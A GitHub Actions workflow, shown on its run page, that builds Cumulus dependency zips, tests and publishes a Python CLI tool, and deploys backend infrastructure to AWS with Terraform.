/deploy uat #189

Workflow file for this run

	name: Build and Deploy

	on:
	push:
	branches:
	- develop
	- main
	- 'release/**'
	- 'feature/**'
	- 'issue/**'
	- 'issues/**'
	- 'dependabot/**'
	workflow_dispatch:

	env:
	REGISTRY: ghcr.io
	IMAGE_NAME: ${{ github.repository }}
	PYTHON_VERSION: '3.10'
	POETRY_VERSION: '1.8.5'
	TERRAFORM_VERSION: '1.5.3'
	CUMULUS_VERSION: 'v18.5.2'

	jobs:
	create-zips:
	name: Create Cumulus Dependency Zips for Backend
	if: \|
	github.ref == 'refs/heads/develop' \|\|
	github.ref == 'refs/heads/main' \|\|
	startsWith(github.ref, 'refs/heads/release') \|\|
	contains(github.event.head_commit.message, '/deploy sit') \|\|
	contains(github.event.head_commit.message, '/deploy uat')
	runs-on: ubuntu-latest
	outputs:
	cumulus_files_created: ${{ steps.upload-files.outputs.files_uploaded }}
	cumulus_node_version: ${{ steps.get_node_version.outputs.cumulus_node_version }}
	steps:
	- name: Checkout Cumulus Code
	uses: actions/checkout@v4
	with:
	repository: nasa/cumulus
	ref: ${{ env.CUMULUS_VERSION }}

	- name: Setup Python
	uses: actions/setup-python@v5
	with:
	python-version: ${{ env.PYTHON_VERSION }}

	- name: Setup Node.js
	uses: actions/setup-node@v4
	with:
	node-version-file: '.nvmrc'
	cache: 'npm'
	cache-dependency-path: '**/package.json'

	- name: Read .nvmrc file
	id: get_node_version
	run: \|
	VERSION=$(cat .nvmrc \| cut -d '.' -f 1)
	FORMATTED_VERSION="nodejs${VERSION}.x"
	echo "cumulus_node_version=$FORMATTED_VERSION" >> $GITHUB_OUTPUT

	# Cache the node_modules
	- name: Cache Node Modules
	id: cache-node-modules
	uses: actions/cache@v4
	with:
	path: \|
	node_modules
	//node_modules
	key: node-modules-${{ env.CUMULUS_VERSION }}-${{ hashFiles('**/package-lock.json') }}

	# Cache the build outputs
	- name: Cache Build Outputs
	id: cache-build
	uses: actions/cache@v4
	with:
	path: \|
	tasks/post-to-cmr/dist
	tasks/hyrax-metadata-updates/dist
	tf-modules/cumulus
	key: backfill-tool-cumulus-build-${{ env.CUMULUS_VERSION }}
	retention-days: 150

	- name: Install Dependencies
	if: steps.cache-node-modules.outputs.cache-hit != 'true'
	run: \|
	npm install -g lerna
	npm install
	npm run bootstrap

	- name: Prepare and Upload Files
	run: \|
	mkdir -p temp
	cp tasks/post-to-cmr/dist/lambda.zip temp/post_to_cmr.zip
	cp tasks/hyrax-metadata-updates/dist/lambda.zip temp/hyrax-metadata-updates.zip
	cp tf-modules/cumulus/ecs_cluster_instance_autoscaling_cf_template.yml.tmpl temp/
	cp tf-modules/cumulus/task-reaper.sh temp/

	- name: Upload Artifacts
	uses: actions/upload-artifact@v4
	with:
	name: cumulus-files
	path: temp/
	retention-days: 1

	build:
	if: always()
	name: Build and Test CLI Tool
	runs-on: ubuntu-latest

	permissions:
	contents: write
	packages: write

	outputs: # Define outputs for this job
	target_env_uppercase: ${{ steps.set-env.outputs.target_env_uppercase }}
	target_env_lowercase: ${{ steps.set-env.outputs.target_env_lowercase }}
	new_version: ${{ steps.set-env.outputs.new_version }}

	steps:
	- name: Checkout Code
	uses: actions/checkout@v4
	with:
	fetch-depth: 0

	- name: Setup Python
	uses: actions/setup-python@v5
	with:
	python-version: ${{ env.PYTHON_VERSION }}

	- name: Install Poetry
	uses: abatilo/actions-poetry@v3
	with:
	poetry-version: ${{ env.POETRY_VERSION }}

	- name: Cache Poetry Dependencies
	uses: actions/cache@v4
	with:
	path: ~/.cache/pypoetry
	key: ${{ runner.os }}-poetry-${{ hashFiles('**/poetry.lock') }}
	restore-keys: \|
	${{ runner.os }}-poetry-

	- name: Set Default Version and Environment
	id: default-version
	run: \|
	echo "pyproject_name=$(poetry version \| awk '{print $1}')" >> $GITHUB_ENV
	VERSION=$(poetry version \| awk '{print $2}')

	# Set default environment based on branch
	if [[ "${{ github.ref }}" =~ ^refs/heads/(issue\|feature\|dependabot)/ ]]; then
	echo "TARGET_ENV_UPPERCASE=SIT" >> $GITHUB_ENV
	NEW_VERSION="${VERSION}+$(git rev-parse --short HEAD)"
	elif [[ "${{ github.ref }}" == "refs/heads/develop" ]]; then
	echo "TARGET_ENV_UPPERCASE=SIT" >> $GITHUB_ENV
	if [[ ${VERSION} =~ -alpha ]]; then
	ALPHA_NUM=$(echo "${VERSION}" \| grep -oP '(?<=-alpha.)\d+' \|\| echo "0")
	NEW_VERSION="${VERSION%-alpha.*}-alpha.$((ALPHA_NUM+1))"
	else
	NEW_VERSION="${VERSION}-alpha.1"
	fi
	elif [[ "${{ github.ref }}" =~ ^refs/heads/release/ ]]; then
	echo "TARGET_ENV_UPPERCASE=UAT" >> $GITHUB_ENV
	if [[ ${VERSION} =~ -rc ]]; then
	RC_NUM=$(echo "${VERSION}" \| grep -oP '(?<=-rc.)\d+' \|\| echo "0")
	NEW_VERSION="${VERSION%-rc.*}-rc.$((RC_NUM+1))"
	else
	NEW_VERSION="${VERSION}-rc.1"
	fi
	elif [[ "${{ github.ref }}" == "refs/heads/main" ]]; then
	echo "TARGET_ENV_UPPERCASE=OPS" >> $GITHUB_ENV
	NEW_VERSION="${VERSION%-rc*}"
	NEW_VERSION="${NEW_VERSION%-alpha*}"
	fi

	echo "new_version=${NEW_VERSION}" >> $GITHUB_ENV

	- name: Override Environment for Deploy Command
	if: contains(github.event.head_commit.message, '/deploy')
	run: \|
	message="${{ github.event.head_commit.message }}"
	override_env=$(echo "$message" \| grep -oE '/deploy (sit\|uat)' \| awk '{print $2}')
	if [[ -n "$override_env" ]]; then
	override_env_upper=$(echo "$override_env" \| tr '[:lower:]' '[:upper:]')
	echo "TARGET_ENV_UPPERCASE=${override_env_upper}" >> $GITHUB_ENV
	echo "TARGET_ENV_LOWERCASE=${override_env}" >> $GITHUB_ENV
	echo "Overriding deployment target to: ${override_env_upper}"
	fi

	- name: Set Lowercase Environment
	run: \|
	echo "TARGET_ENV_LOWERCASE=$(echo ${{ env.TARGET_ENV_UPPERCASE }} \| tr '[:upper:]' '[:lower:]')" >> $GITHUB_ENV

	- name: Update Package Version
	run: poetry version ${{ env.new_version }}

	- name: Build, Install and Test
	run: \|
	poetry build
	poetry install
	poetry run pylint podaac
	poetry run flake8 podaac
	poetry run pytest --junitxml=build/reports/pytest.xml --cov=podaac/ --cov-report=html -m "not aws and not integration" tests/

	- name: Run Snyk Security Scan
	uses: snyk/actions/python@master
	env:
	SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}
	with:
	command: monitor
	args: >
	--org=${{ secrets.SNYK_ORG_ID }}
	--project-name=${{ github.repository }}
	--severity-threshold=high
	--fail-on=all

	- name: Commit Version Changes
	if: \|
	github.ref == 'refs/heads/develop' \|\|
	github.ref == 'refs/heads/main' \|\|
	startsWith(github.ref, 'refs/heads/release')
	run: \|
	if [[ -n "$(git status --porcelain)" ]]; then
	git config user.name "${GITHUB_ACTOR}"
	git config user.email "${GITHUB_ACTOR}@users.noreply.github.com"
	git commit -am "/version ${{ env.new_version }}"
	git tag -a "${{ env.new_version }}" -m "Version ${{ env.new_version }}"
	git push --follow-tags
	fi

	- name: Publish to Test PyPI
	if: \|
	github.ref == 'refs/heads/develop' \|\|
	startsWith(github.ref, 'refs/heads/release')
	env:
	POETRY_PYPI_TOKEN_TESTPYPI: ${{ secrets.TEST_PYPI_API_TOKEN }}
	run: \|
	poetry config repositories.testpypi https://test.pypi.org/legacy/
	poetry publish -r testpypi

	- name: Publish to PyPI
	if: github.ref == 'refs/heads/main'
	env:
	POETRY_PYPI_TOKEN_PYPI: ${{ secrets.PYPI_API_TOKEN }}
	run: poetry publish --skip-existing

	- name: Set Environment Output
	id: set-env
	run: \|
	echo "target_env_uppercase=${{ env.TARGET_ENV_UPPERCASE }}" >> $GITHUB_OUTPUT
	echo "target_env_lowercase=${{ env.TARGET_ENV_LOWERCASE }}" >> $GITHUB_OUTPUT
	echo "new_version=${{ env.new_version }}" >> $GITHUB_OUTPUT

	terraform-deploy:
	needs: [create-zips, build]
	if: \|
	github.ref == 'refs/heads/develop' \|\|
	github.ref == 'refs/heads/main' \|\|
	startsWith(github.ref, 'refs/heads/release') \|\|
	contains(github.event.head_commit.message, '/deploy sit') \|\|
	contains(github.event.head_commit.message, '/deploy uat')
	name: Deploy Backend Infrastructure Terraform
	runs-on: ubuntu-latest

	permissions:
	contents: write
	packages: write

	steps:
	- name: Checkout Code
	uses: actions/checkout@v4
	with:
	fetch-depth: 0

	- name: Download Cumulus Files
	uses: actions/download-artifact@v4
	with:
	name: cumulus-files
	path: ./terraform-deploy

	- name: Setup Terraform
	uses: hashicorp/setup-terraform@v3
	with:
	terraform_version: ${{ env.TERRAFORM_VERSION }}

	- name: Deploy with Terraform
	working-directory: terraform-deploy/
	env:
	AWS_ACCESS_KEY_ID: ${{ secrets[format('AWS_ACCESS_KEY_ID_SERVICES_{0}', needs.build.outputs.target_env_uppercase)] }}
	AWS_SECRET_ACCESS_KEY: ${{ secrets[format('AWS_SECRET_ACCESS_KEY_SERVICES_{0}', needs.build.outputs.target_env_uppercase)] }}
	AWS_ACCOUNT_ID: ${{ secrets[format('AWS_ACCOUNT_ID_SERVICES_{0}', needs.build.outputs.target_env_uppercase)] }}
	AWS_DEFAULT_REGION: us-west-2
	TF_VAR_permissions_boundary_arn: ${{ secrets[format('PERMISSIONS_BOUNDARY_ARN_{0}', needs.build.outputs.target_env_uppercase)] }}
	TF_VAR_buckets_name: ${{ secrets[format('BUCKET_{0}', needs.build.outputs.target_env_uppercase)] }}
	TF_VAR_system_bucket: ${{ secrets[format('SYSTEM_BUCKET_{0}', needs.build.outputs.target_env_uppercase)] }}
	TF_VAR_dmrpp_url: ${{ secrets.DMRPP_URL }}
	TF_VAR_aws_security_group_ids: ${{ secrets[format('SECURITY_GROUP_IDS_{0}', needs.build.outputs.target_env_uppercase)] }}
	TF_VAR_cumulus_node_version: ${{ needs.create-zips.outputs.cumulus_node_version }}
	TARGET_ENV: ${{ needs.build.outputs.target_env_lowercase }}
	run: \|
	curl -L -o metadata-aggregator.zip https://github.com/podaac/cumulus-metadata-aggregator/releases/download/v8.7.0-alpha.6-SNAPSHOT/cumulus-metadata-aggregator-8.7.0-alpha.6-SNAPSHOT.zip
	python3 override.py "$TARGET_ENV"
	source bin/config.sh "$TARGET_ENV"

	terraform init
	terraform plan -var-file=tfvars/"$TARGET_ENV".tfvars -var="app_version=${{ needs.build.outputs.new_version }}" -out=tfplan
	terraform apply -auto-approve tfplan

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

/deploy uat #189

Workflow file

/deploy uat #189

Jobs

Run details

Workflow file for this run